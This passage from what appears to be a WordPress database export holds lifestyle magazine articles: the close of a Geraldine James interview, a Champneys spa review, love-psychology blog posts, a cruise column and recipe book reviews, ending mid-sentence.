‘Do you have any idea what it’s like to lose your mind, Geraldine?’ And I was never cross with her again.</p>&#13;\n<p>“But I have also said to my husband and my daughter that if I go the same way they should do whatever they feel necessary to hasten my end. I can’t believe that this disease has gone on so long without us finding a way of helping people.”</p>&#13;\n<p>Her husband and daughter, Ellie, are the backbone of her life. She and Joe Blatchley, a director and actor, have been together for 35 years. “I can remember when Olivia Harrison was asked how she and George had stayed married so long she said, ‘By not getting divorced’ and that is exactly how it is with us.</p>&#13;\n<p>“Like every couple we’ve had our ups and downs. But, perhaps because each of us had known the misery of coming from divorced parents, we were always determined to work at it and stay together. My life would not have been remotely the same without Joe’s love and his utter steadfastness.”</p>&#13;\n<p>The ups and downs have included their thwarted attempts to have more than one child. “We tried and tried, but it didn’t work and it’s wrong to build your life around an absence.”</p>&#13;\n<p>There was a time, she admits, when she felt slightly needled that Ellie rejected her parents’ profession, becoming a human rights worker instead. “But really it wouldn’t have been a good fit for her.”</p>&#13;\n<p>On the plus side, too, she won’t suffer the actress’s insecurities, rejections, as well as the tyranny of remaining eternally young. “And none of us is immune,” Geraldine admits</p>&#13;\n<p>“You look around and see so many actresses having ‘work’ done. I haven’t been down that road myself and would probably be too scared to try it, but I can understand the pressures.</p>&#13;\n<p>“In the old days they used to take two hours to light a scene and two minutes to shoot it. Now it’s entirely the other way round. Care isn’t taken to make older actresses look their best and HD TV, which shows every pore and wrinkle, is an added nightmare.</p>&#13;\n<p>“It’s sad,” she adds, “because ageing faces are also beautiful. I look at myself in the mirror these days and think, ‘This face has taken me through 62 years of weather, anxiety, happiness, misery, love, growing up, learning. This is the face that’s taken me forward into my life. Why would I want to change it?’”</p>&#13;\n<p>Nor, she says, would she return to her youth. “I was so driven and desperate to prove myself. I’d like to tell my 20-year-old self ‘Don’t worry so much, it will all work out, I promise.’</p>&#13;\n<p>If it ended tomorrow, then, she adds, “I’d be able to say, ‘I’ve had a wonderful life, a fantastic career and I wouldn’t change a thing.” </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5><em>Thirteen Steps Down starts on ITV1 on 13 August <div class=\"woo-sc-hr\"></div></em></h5>&#13;\n									</div>','This life, Geraldine James','Geraldine James tells Daphne Lockyer she is busier than ever and she’s more than happy to play older than her 62 years in her latest role, featured, get up and go, thirteen steps down, alzheimers','publish','open','open','','this-life-geraldine-james','','','2018-04-02 20:05:07','2018-04-02 20:05:07','',0,'http://westonspirit.org.uk/this-life-geraldine-james.asp',0,'post','',0),(221,1,'2017-12-14 08:00:34','2017-12-14 08:00:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> michaelbywater\" title=\"Posts by Michael Bywater\" rel=\"author\"&gt;Michael Bywater</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"To boldly go where no man has gone before\" st_url=\"http://westonspirit.org.uk/2012/07/to-boldly-go-where-no-man-has-gone-before/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"To boldly go where no man has gone before\" st_url=\"http://westonspirit.org.uk/2012/07/to-boldly-go-where-no-man-has-gone-before/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"To boldly go where no man has gone before\" st_url=\"http://westonspirit.org.uk/2012/07/to-boldly-go-where-no-man-has-gone-before/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"To boldly go where no man has gone before\" st_url=\"http://westonspirit.org.uk/2012/07/to-boldly-go-where-no-man-has-gone-before/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"To boldly go where no man has gone before\" st_url=\"http://westonspirit.org.uk/2012/07/to-boldly-go-where-no-man-has-gone-before/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Real men don’t relax, so your intrepid correspondent approached a stay at Champneys with healthy scepticism… but left with a healthier body – and mind.</h4>&#13;\n<div id=\"attachment_2750\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2750\" title=\"champneys2- p12\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/champneys2-p12.jpg\" alt=\"\" width=\"596\" height=\"395\" /><p class=\"wp-caption-text\">The thalassotherapy pool with sea water</p></div>&#13;\n<p>I’m a man, and men don’t relax. We sleep, get over-excited and get tense. Sometimes (women can’t do this) we do all three at once.</p>&#13;\n<p>So when they said “Have a couple of days relaxing and being pampered”, my tension levels went through the roof. Even the masseuse at Champneys Tring, the king of British health spas, said I was tense. I couldn’t say “What do you expect? I’m relaxing. I’m being pampered. Of course I’m tense”. I just sort of apologised, as men do when it’s something – anything – to do with our bodies.</p>&#13;\n<p><img class=\"alignright  wp-image-2751\" title=\"Champneys - p12\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Champneys-p12.jpg\" alt=\"\" width=\"108\" height=\"163\" />Because, for men, it’s bodies that are the problem. The whole idea of Champneys is to tend to the body, rubbing it and feeding it healthily, warming and cooling it, relaxing it, freeing it from the mental stresses that knot us up. They cover the entire gamut, from weight management and detox to clairvoyant readings, from cardiac prevention and (if you didn’t listen to the clairvoyant, who’d presumably have warned you in advance) rehabilitation to hypnotherapy. You can have a sports massage, but I didn’t deserve that because I don’t do sports, and you can have osteopathic de-stress treatment, which is a worry because what if one becomes de-stressed? I could see myself collapsing into an unsporty and boneless heap of stresslessness, like Jabba the Hutt.</p>&#13;\n<p>Acupressure, stone therapy, Tui na, manual lymphatic drainage, Bach flower remedies, Bowen Technique: all these at my disposal. But I’m a man. How can I do this?</p>&#13;\n<p>As I drove up the impressive sweeping drive, through immaculate lawns to the elegant country house, odd images crowded into my mind. In my imaginary Champneys, Barbara Windsor was playing nude volleyball behind a hedge while Sid James leered and Charles Hawtrey shivered knock-kneed by a greenish, icy swimming-pool. Somewhere nearby there would be an illicit pie stall in a layby for clients driven to madness by the lettuce-leaf and lemon-water diet. The soundtrack from The Road to Wellville played its intestinal tubas in my mind and was it me, or was that really the voice of Anthony Hopkins as John Harvey Kellogg, holding forth about beefsteak as the source of all corruption?</p>&#13;\n<div id=\"attachment_2753\" class=\"wp-caption alignright\" style=\"width: 225px\"><img class=\" wp-image-2753  \" title=\"Champneys 3 -p13\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Champneys-3-p13.jpg\" alt=\"\" width=\"215\" height=\"168\" /><p class=\"wp-caption-text\">Champneys Tring</p></div>&#13;\n<p>No. It wasn’t. The place was charming. Comfortable. Courteous staff. Five-star service. Cheerful-looking people pottering about in what the nice man at reception described as “tribal dress”: a hugely fluffy white towelling dressing gown and equally fluffy flip-flops. Lunch was actual lunch, with actual food that you could identify as food, not as a sort of edible penance.</p>&#13;\n<p>This was not as I expected. I didn’t sit at the Champneys Table, a sort of free-for-all for those relaxing and being pampered on their own, partly because I was too alarmed at the pleasantness of it all, and partly because they were all women. Not Russian oligarchs’ women, sent off for their monthly scrubbing-up, nor the desperate sort, staving off time and flesh, but nice, normally-upholstered women, not entirely in the bloom of youth, nattering away happily.</p>&#13;\n<p>In one of the corridors, on the way to the library, things were more as I expected. Duckboard floors, curtained cubicles in one of which a very thin man was having a colonic lavage from an equally thin man in a white coat while two stern nurses looked on. There were buckets and spartan examination tables and an awful lot of water being sluiced around. But these were photographs from the 1920s when naturopath Stanley Lief opened the place as Britain’s first-ever health farm.</p>&#13;\n<div id=\"attachment_2755\" class=\"wp-caption alignright\" style=\"width: 161px\"><img class=\" wp-image-2755   \" title=\"Champneys food - p13\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Champneys-food-p13.jpg\" alt=\"\" width=\"151\" height=\"99\" /><p class=\"wp-caption-text\">Fine cuisine on offer</p></div>&#13;\n<p>Now it’s soft music and careful lighting, thalassotherapy (where you’re squirted with sea-water) and, so un-punitive has it become, a crafty but legitimate fag on the terrace, and nobody to tell you off.</p>&#13;\n<p>There’s even Sun Tower treatment and something called Kriotherapy, described by one of the Champneys Table ladies to me as “A sort of cell and they squirt freezing cold water at you and you do exercises and then you’re invigorated. Restarted. You know detox? Well this is like retox.”</p>&#13;\n<p>They should give Champneys the NHS preventive medicine contract. The entire nation would be glowing with health. I defy anyone not to come away feeling, if not being, lighter. Pampered. Almost – though it’s hard to admit this, as a man – relaxed.</p>&#13;\n<p>On my way there, I’d noted the nearest pub. On my way back, I drove straight past it, not so much smirking as glowing. Next time, I’ll try the Kriotherapy. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5><em>Michael Bywater</em> is a journalist. He was a guest at Champneys where one night including meals, all facilities and a choice of two treatments, starts from £244pp. <a href=\"http://www.champneys.com/\">www.champneys.com</a> <div class=\"woo-sc-hr\"></div> </h5>&#13;\n									</div>','To boldly go where no man has gone before','Real men don’t relax, so your intrepid correspondent approached a stay at Champneys with healthy scepticism… but left with a healthier body – and mind.','publish','open','open','','to-boldly-go-where-no-man-has-gone-before','','','2018-04-02 20:05:02','2018-04-02 20:05:02','',0,'http://westonspirit.org.uk/to-boldly-go-where-no-man-has-gone-before.asp',0,'post','',0),(222,1,'2015-05-23 16:47:10','2015-05-23 16:47:10','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Vive la difference: Men &amp; Women\" st_url=\"http://westonspirit.org.uk/2012/07/vive-la-difference-men-women/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Vive la difference: Men &amp; Women\" st_url=\"http://westonspirit.org.uk/2012/07/vive-la-difference-men-women/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Vive la difference: Men &amp; Women\" st_url=\"http://westonspirit.org.uk/2012/07/vive-la-difference-men-women/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Vive la difference: Men &amp; Women\" st_url=\"http://westonspirit.org.uk/2012/07/vive-la-difference-men-women/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Vive la difference: Men &amp; Women\" st_url=\"http://westonspirit.org.uk/2012/07/vive-la-difference-men-women/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Psychology Of Love – Part 3</h4>&#13;\n<p>Contrary to popular beliefs, romantic ideals are not the sole province of the fair sex. Both men and women report experiencing the same levels of intensity of love. However, there are some differences between the sexes that contradict the romantic notions of the lightning strike of mutual attraction. For example, men tend to fall in love at an earlier point in a relationship than women, and women fall out of love more quickly than men. When it comes to falling in love, a woman might be still at the ‘getting to know you’ stage, while the man could be ready for the comforts of home and Saturday afternoon football. The finding that women fall out of love more quickly could explain why so many men are left watching the football, wondering where their partners have gone.</p>&#13;\n<p>Most people would like to believe that, despite these differences, men and women eventually get to the same place, even though it might not necessarily be at the same time! However, research indicates that although men and women might feel love equally passionately, the place they get to is very different.</p>&#13;\n<p>Generally men are supposed be spontaneous (some might argue irresponsible) and enjoy the game playing love of Ludus with all the passionate and sexual fun of Eros. Whereas, it is assumed that women tend to be more practical preferring the security of Pragma and the friendship of Agape. So, it would appear that, even if men and women are in the same place, they view love in very different ways. Most people would admit that intimate relationships are complicated but the different styles of love adopted by men and women make the whole experience a bit like a game of football, but with one team playing cricket.</p>&#13;\n<p>While research has identified a number of different tendencies in men and women’s styles of love, the greatest difference of all, and probably the one that causes the most problems, is how men and women communicate their love.</p>&#13;\n<p>It is well known that women prefer the verbal language of love (okay they like to talk), but for most women the spoken word is the key to all romantic and loving encounters. Whereas, for men, actions speak louder than words and they tend to show their love by buying gifts, fixing something, or in physical ways like hugs and sex. Indeed, all you have to do to confirm these differences is observe how women and men play with children. Women usually play games that involve reading or verbal communication, whereas men generally enjoy the physical activities of sport, building, rough-and-tumble etc.</p>&#13;\n<p>Basically, women like to hear how their partners feel about them, while men like to show how they feel with actions. Perhaps this is the reason why, in adult romantic relationships, most men run in terror when they hear those four little words ‘we need to talk’, and women accuse men of only being interested in sex when they get a pat on their backsides.</p>&#13;\n<p>So, if women and men can’t get the timing right, are playing different games and speaking a different language, it is perhaps not surprising that love isn’t always the ‘many splendoured thing’ that the romantics would have us believe.</p>&#13;\n<h5>In Blog 4: Love At First Sight. <div class=\"woo-sc-hr\"></div></h5>&#13;\n<p><img class=\"alignright  wp-image-2534\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Dr-Lori-Boul2.jpg\" alt=\"\" width=\"144\" height=\"198\" /><a href=\"http://www.drloriboul.com/\" target=\"_blank\"><em><strong>Dr. Lori</strong> </em></a>Boul gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT%5FTITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\"><em><strong>DIY Sex and Relationship Therapy</strong> </em></a>has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5> <em><a href=\"http://www.drloriboul.com/\" target=\"_blank\">www.drloriboul.com</a></em> <div class=\"woo-sc-hr\"></div></h5>&#13;\n<p> </p>&#13;\n									</div>','Vive la difference: Men &amp; Women','LOVE IS, PSYCHOLOGY OF LOVE, DR LORI BOUL, DIY SEX AND RELATIONSHIP THERAPY, MALE MENOPAUSE, HUMAN SEXUALITY','publish','open','open','','vive-la-difference-men-women','','','2018-04-02 20:05:00','2018-04-02 20:05:00','',0,'http://westonspirit.org.uk/vive-la-difference-men-women.asp',0,'post','',0),(223,1,'2017-09-20 15:28:10','2017-09-20 15:28:10','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">13 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"What is this thing called love?\" st_url=\"http://westonspirit.org.uk/2012/07/what-is-this-thing-called-love/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"What is this thing called love?\" st_url=\"http://westonspirit.org.uk/2012/07/what-is-this-thing-called-love/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"What is this thing called love?\" st_url=\"http://westonspirit.org.uk/2012/07/what-is-this-thing-called-love/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"What is this thing called love?\" st_url=\"http://westonspirit.org.uk/2012/07/what-is-this-thing-called-love/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"What is this thing called love?\" st_url=\"http://westonspirit.org.uk/2012/07/what-is-this-thing-called-love/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Pyschology Of Love – Part 1</h4>&#13;\n<p>Most people, for most of the time in their adult life, are either: looking for love, falling in love, in a loving relationship, falling out of love or broken-hearted. Since love is a powerful emotion that can take over our lives it is perhaps not surprising that it has been the subject of much speculation and theorising across the globe and throughout the ages. In theory, given all this experience and debate, we should all be experts on love. But if this were the case then agony aunts, relationship therapists and divorce lawyers would be out of a job. So, what do we mean by the term love and how does this powerful emotion shape the way we feel and think about one another?</p>&#13;\n<p>We can be fairly confident that the emotion we call love has always been a characteristic of human experiences. Some of the earliest recorded poetry and novels on love come from Babylon in 2000 BC, the Egyptians in 1300 BC and the Chinese were writing love songs in 1000 BC. But our fascination with defining love appears to have started with the scholars of Ancient Greece and Rome when different types of love were conceptualised.</p>&#13;\n<p>Over the ensuing years, poets, writers, song-smiths, movie-makers, greeting card manufacturers and florists have promoted the romantic ideal of love. Even before we are old enough to experience an intimate loving relationship, we are programmed with romantic notions: Sleeping beauty was awakened by her Prince; Lady Guinevere was wooed by Sir Lancelot; and Romeo and Juliet died for love. Such programming continues into adult life, leading us into beliefs of �?love at first sight’, �?love can overcome all’, �?there is only one true love’ and �?love will last forever’. However, this is a description of love as a romantic ideal that has been all wrapped up in pretty ribbons and sold to us throughout our lives.</p>&#13;\n<p>While life would be very drab without these romantic fantasies, many people make devastating decisions while under the influence of such illusions. They cloud our vision when selecting a partner (Eva Braun chose Hitler!), prevent us from understanding the true nature of a loving relationship and encourage us to cling on to partners that are not good for us. Both logic and reason tell us that the fairy tales, fantasies and movies aren’t real – but logic and reason have little to do with romantic love. After all, romantic souls keep on kissing frogs, even if they repeatedly catch herpes.</p>&#13;\n<p>Romantic notions of love still abound but there is now a great deal of scientific research that has covered everything from falling in love to broken hearts. Although it has been argued that scientific examination of love could ruin its very essence or mystery it hasn’t stopped psychologists from trying to answer the question �?What is love?’ The answers they have come up with tend to divide love into two broad categories, passionate love and companionate love, which are not necessarily mutually exclusive.</p>&#13;\n<p>Throughout this series of blogs I explore some of the psychological research that offers explanations on how we fall in love, why we are attracted to some people and not others, and how we stay in love.</p>&#13;\n<h5>In Blog 2: The History of Love <div class=\"woo-sc-hr\"></div></h5>&#13;\n<p><em><strong><img class=\"alignright  wp-image-2517\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Dr-Lori-Boul.jpg\" alt=\"\" width=\"144\" height=\"198\" /><a href=\"http://www.drloriboul.com/\" target=\"_blank\">Dr. Lori Boul</a></strong> </em>gained her PhD at the University of Sheffield in the UK and the research for her thesis, into �?male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT%5FTITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\"><em><strong>DIY Sex and Relationship Therapy</strong></em></a> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology.  She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><em><a href=\"http://www.drloriboul.com/\" target=\"_blank\">www.drloriboul.com</a></em> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','What is this thing called love?','What is this thing called love?, dr lori boul, diy sex & relationship therapy, male menopause, human sexuality, love is','publish','open','open','','what-is-this-thing-called-love','','','2018-04-02 20:04:59','2018-04-02 20:04:59','',0,'http://westonspirit.org.uk/what-is-this-thing-called-love.asp',0,'post','',0),(224,1,'2017-02-20 09:21:29','2017-02-20 09:21:29','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A case for cruise control\" st_url=\"http://westonspirit.org.uk/2012/08/a-case-for-cruise-control/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A case for cruise control\" st_url=\"http://westonspirit.org.uk/2012/08/a-case-for-cruise-control/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A case for cruise control\" st_url=\"http://westonspirit.org.uk/2012/08/a-case-for-cruise-control/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A case for cruise control\" st_url=\"http://westonspirit.org.uk/2012/08/a-case-for-cruise-control/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A case for cruise control\" st_url=\"http://westonspirit.org.uk/2012/08/a-case-for-cruise-control/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4></h4>&#13;\n<p><img width=\"596\" height=\"431\" src=\"/wp-content/uploads/2012/08/104241367.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">I always thought cruising was for old people, so naturally I was never interested, not being old. And never will be. It’s only other people who are old such as, well, older people.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">We did go on the QE2 to New York many years ago, back in 1976, American bicentenary year. I remember the year because on board some dignitary was carrying a copy of Magna Carta to go on a display somewhere.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">It was awful. The weather was appalling, I got seasick, the kids got seasick, it was like being in prison: cooped up, nowhere to walk. The joke swimming pool on deck was closed because the waves on it were about as high as the real ones. Yes, the food was great, which meant you just stuffed your face. And felt worse.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">The only good part was arriving – passing the Statue of Liberty, seeing the NY skyline at dawn. But come on, all that way for one view. So afterwards I said never again. The best part of sailing is looking at the ships – not actually being on them. </p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">But, you know how it is, with age, dodgy knees, awful airports, carting luggage, all the faff of modern travel, hanging around, endless delays.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">It struck me that the biggest attraction of cruising is that you get to see different countries, different places, without having to pack. You also don’t have to hang around airports, railway stations, car hire places. That stuff is done for you.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">So I thought I would give it a go and over the last two years I have been on four cruises. The arriving at each place was better than I had imagined. With a bit of luck, and depending on the cruise you pick, you land in a different place every day. (That QE2 was not a cruise, as such, but an Atlantic crossing, so there was only one arrival.)</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Waking up, finding yourself no longer at sea, but slowly gliding into a new harbour, sliding into a new culture, was so exciting. </p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">On my first cruise, with Silversea, the places we visited included Muscat in Oman and Bandar Abbas in Iran. I would never ever have visited Iran, but for that cruise. In every port, I went on a conducted tour, and they were excellent, if a bit exhausting. On board, the food and service and cabins were terrific, as they should have been, as I have only ever been on five-star cruises.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">But while at sea, especially two whole days at sea, each time I did get very bored. It became claustrophobic, my body felt lumpen, my stomach felt too full. Yes, there are lots of diversions, attractions, endless shows, but all laughably old-fashioned, dated, inoffensively mass-market.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Most people love cruises, with many notching up four a year. The cruise industry is enormously popular, still growing, offering great food and service and value for money. But I think I prefer a holiday on land, able to feel free. ?So, I don’t plan to go again. Not till I’m really old…</p>&#13;\n									</div>','A case for cruise control','I always thought cruising was for old people, so naturally I was never interested, not being old. And never will be. It’s only other people who are old such as,','publish','open','open','','a-case-for-cruise-control','','','2018-04-02 20:04:57','2018-04-02 20:04:57','',0,'http://westonspirit.org.uk/a-case-for-cruise-control.asp',0,'post','',0),(225,1,'2017-05-27 14:35:03','2017-05-27 14:35:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 August 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> kfowler\" title=\"Posts by Kerry Fowler\" rel=\"author\"&gt;Kerry Fowler</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Add flavor to your recipe repertoire\" st_url=\"http://westonspirit.org.uk/2012/08/add-flavor-to-your-recipe-repertoire-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Add flavor to your recipe repertoire\" st_url=\"http://westonspirit.org.uk/2012/08/add-flavor-to-your-recipe-repertoire-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Add flavor to your recipe repertoire\" st_url=\"http://westonspirit.org.uk/2012/08/add-flavor-to-your-recipe-repertoire-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Add flavor to your recipe repertoire\" st_url=\"http://westonspirit.org.uk/2012/08/add-flavor-to-your-recipe-repertoire-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Add flavor to your recipe repertoire\" st_url=\"http://westonspirit.org.uk/2012/08/add-flavor-to-your-recipe-repertoire-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Kerry Fowler sinks her teeth into the latest recipe books hitting the shelves</h4>&#13;\n<p><img width=\"300\" height=\"590\" src=\"/wp-content/uploads/2012/08/Copy-of-foodpage.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Simple Cooking, Antonio Carluccio, Quadrille Publishing, £9.99</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“The biggest discovery of a dish happens when you are obliged to use leftovers – how to include them, how to make them interesting,” Carluccio says. “My mother was an artist in it: she knew not only to cook for the next day, but for late at night – we were a big family, lots of children always thinking about food.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“We might go hunting in the evening and come back and find ourselves in front of the fridge wondering what to eat and she will have been clever enough to create something for us from the meal before. With too much risotto you can turn it into little arancini: fried balls of rice with a little egg and breadcrumbs. Or mince all the little delicious bits of a roast with some cooked vegetables and make a stuffing for ravioli. The sauce is the juices and goodness from the roasting pan cooked with stock, and a sprinkle of parmesan. Never throw anything away. There is creativity in finding a way to use food.”</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Nigel Slater: The Kitchen Diaries II, Fourth Estate, £30</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Here we are again privy to the perfectly described culinary thoughts of a man who loves his food, his pans, his vegetable garden, through every day and season of the year – from using ham and cabbage in a fry-up, Seville marmalade in an ice cream, to roasting pork belly with pomegranate molasses and mixing up mincemeat and orange trifle. His words touch something deep and primitive: appetite. A gorgeous book in the pure sense.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">The Food of Morocco, Paula Wolfert, Bloomsbury, £35</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“North African bread is sacred and is treated with respect. If you see a piece lying on the ground, you pick it up and kiss it and put it somewhere it will not be stepped on.” This resplendent book of Moroccan recipes reflects cookery writer Paula Wolfert’s passion for the cooking customs and for the country itself.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Rich with pictures of plump sacks of spices and grains, stems of saffron and steaming couscous, it takes you intelligently through the essential ingredients and methods: argan oil, ras-el-hanout; tagines and bastillas, and into a wealth of recipes, all headed up with a little Moroccan kitchen history.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Rosemary Shrager’s Absolutely Foolproof Food for Family and Friends, Hamlyn, £18.99</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">There’s an entirely pleasant waft of pantry and pressed white apron to this home-cookery masterclass from Swinton Park Cookery School chef Rosemary Shrager. You can almost hear her cheerfully chivvying you to try your hand at such rewarding kitchen challenges as raising your own pork pie or crowning a pheasant – illustrated with clear-as-consommé, step-by-step pictures. Alongside the methodology are tasty modern classic twists – from roast quail with saffron risotto to dover sole in a curry coating.</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Simple Cooking, Antonio Carluccio, Quadrille Publishing, £9.99</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">“The biggest discovery of a dish happens when you are obliged to use leftovers – how to include them, how to make them interesting,” Carluccio says. “My mother was an artist in it: she knew not only to cook for the next day, but for late at night – we were a big family, lots of children always thinking about food.</p>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">We might go hunting in the evening and come back and find ourselves in front of the fridge wondering what to eat and she will have been clever enough to create something for us from the meal before. With too much risotto you can turn it into little arancini: fried balls of rice with a little egg and breadcrumbs. Or mince all the little delicious bits of a roast with some cooked vegetables and make a stuffing for ravioli. The sauce is the juices and goodness from the roasting pan cooked with stock, and a sprinkle of parmesan. Never throw anything away. There is creativity in finding a way to use food.”</p>&#13;\n<h3 class=\"para para_$ID/NormalParagraphStyle\">Nigel Slater: The Kitchen Diaries II, Fourth Estate, £30</h3>&#13;\n<p class=\"para para_$ID/NormalParagraphStyle\">Here we are again privy to the perfectly described culinary thoughts of a man who loves his food, his pans, his vegetable garden, through every day and season of the year – from using ham and cabbage in a fry-up, Seville marmalade in an ice cream, to roasting pork belly with pomegranate 